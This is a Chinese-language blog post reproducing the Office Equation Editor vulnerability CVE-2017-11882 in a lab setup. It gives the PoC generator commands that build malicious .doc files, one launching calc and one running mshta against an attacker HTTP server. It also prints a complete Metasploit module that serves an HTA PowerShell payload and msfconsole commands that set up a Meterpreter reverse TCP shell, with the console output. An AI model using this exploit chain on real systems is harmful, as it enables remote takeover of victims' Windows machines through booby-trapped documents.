2017-11-23 5 分钟读完 (大约 701 个字)

Office CVE-2017-11882复现

这两天，office又出名了，CVE-2017-11882成了圈里关注的热点，今年office爆出好几个漏洞，从CVE-2017-0199、CVE-2017-8570到现在的CVE-2017-11882，exp也是越来越简单粗暴。

下面，我也来蹭波热度。

Step1：万年计算器POC

POC GitHub：可以使用国外出现的第一份poc：https://github.com/embedi/CVE-2017-11882，不过已经停止更新了。这里我使用：https://github.com/Ridter/CVE-2017-11882。
使用clone或直接下载zip都行：

1	git clone https://github.com/Ridter/CVE-2017-11882.git

进入项目文件

1 2	root@Kali:~/hackhub/CVE-2017-11882# python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc [*] Done ! output file --> calc.doc

用靶机打开

至此，以验证该漏洞存在。想在0199的时候还需要自己避免交互，现在poc直接帮你解决。。。

Step2：Get Shell

1、还是使用上一步的脚本

1 2	root@Kali:~/hackhub/CVE-2017-11882# python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.231:8080/abc" -o test.doc [*] Done ! output file --> test.doc

先把doc文档放到靶机。

2、上msf
首先添加利用脚本，我机子msf exp的路径是/usr/share/metasploit-framework/modules/exploits/windows，可以在这目录下新建一个文件夹。
将下面的脚本写入到PS_shell.rb。

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule  < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})
    super(update_info(info,
      'Name' => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      'License' => MSF_LICENSE,
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'Targets' =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget' => 0,
    ))
  end

  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win '}
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end


  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end

打开msf，执行msfconsole。进去后记得要 reload_all。选择PS_shell脚本，然后开启监听

msf > use exploit/windows/new-exps/PS_shell 
msf exploit(PS_shell) > 
msf exploit(PS_shell) > 
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.1.231
lhost => 192.168.1.231
msf exploit(PS_shell) > set uripath abc
uripath => abc
msf exploit(PS_shell) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.231:4444 
[*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://192.168.1.231:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.231:8080/abc"